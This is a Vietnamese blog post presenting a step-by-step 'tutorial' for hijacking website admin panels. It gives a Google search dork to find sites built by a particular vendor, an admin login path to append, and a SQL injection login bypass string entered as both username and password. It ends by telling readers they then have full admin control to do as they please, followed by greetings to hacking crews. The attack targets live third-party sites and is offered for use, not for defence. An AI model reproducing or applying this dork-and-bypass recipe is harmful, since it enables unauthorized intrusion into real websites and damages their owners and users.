:))
:((
:D
:(
:)
:-)
;)
=))
:p
=.=
==
^_^
/=he
:*
/=r
/=l
:v
/=ok
/=clap
(y)
(yy)
/=hi
/=j
/=hup
/=hd
/=hl
/=hr
/=s
<3

Hướng dẫn bình luận

Chèn link

Sử dụng thẻ TÊN_HIỂN_THỊ

Chèn hình ảnh

[img] LINK_ANH [/img] - sử dụng công cụ bên dưới để upload ảnh.

Định dạng chữ

Chữ in đậm
Chữ in nghiêng
Chữ gạch chân
Chữ gạch ngang

Chèn một đoạn Code

Đầu tiên sử dụng công cụ này để mã hóa đoạn code muốn chèn.
Sau đó dùng thẻ [code] CODE_ĐÃ_MÃ_HÓA [/code]

Đã hiểu

Tut khai thác lỗi Website Admin Page 0day 1/5/2017

0 Bình luận 08:45

Bước 1:


Vào google gõ lệnh tìm kiếm:


"Powered by Ofek Technologies"

"Powered by Ofek Technologies"
hoặc

Bước 2:


Truy cập Website bất kỳ, thêm đuôi link admin phía sau:

site-bi-hack.com/index.php/admin/login.html

site-bi-hack.com/index.php/admin/login.html

Bước 3:

Đăng nhập với User và Pass như bên dưới


[+] Username: '=' 'or'
[+] Password: '=' 'or'

[+] Username: '=' 'or'
[+] Password: '=' 'or'

Bước 4:

Toàn quyền Admin, muốn làm gì thì làm

hanks : | nginxDEX – Vcry – Kerens_id – StuxN3t – Codename – CowoKerensTeam – trenggalek6etar – XaiSyndicate -indoXploit |

Bài viết liên quan:

Không có nhận xét nào:

Đăng nhận xét

Copyright © 2017-2018 By Trọng Trung-Thủ Thuật
About:Nguyễn Trọng Trung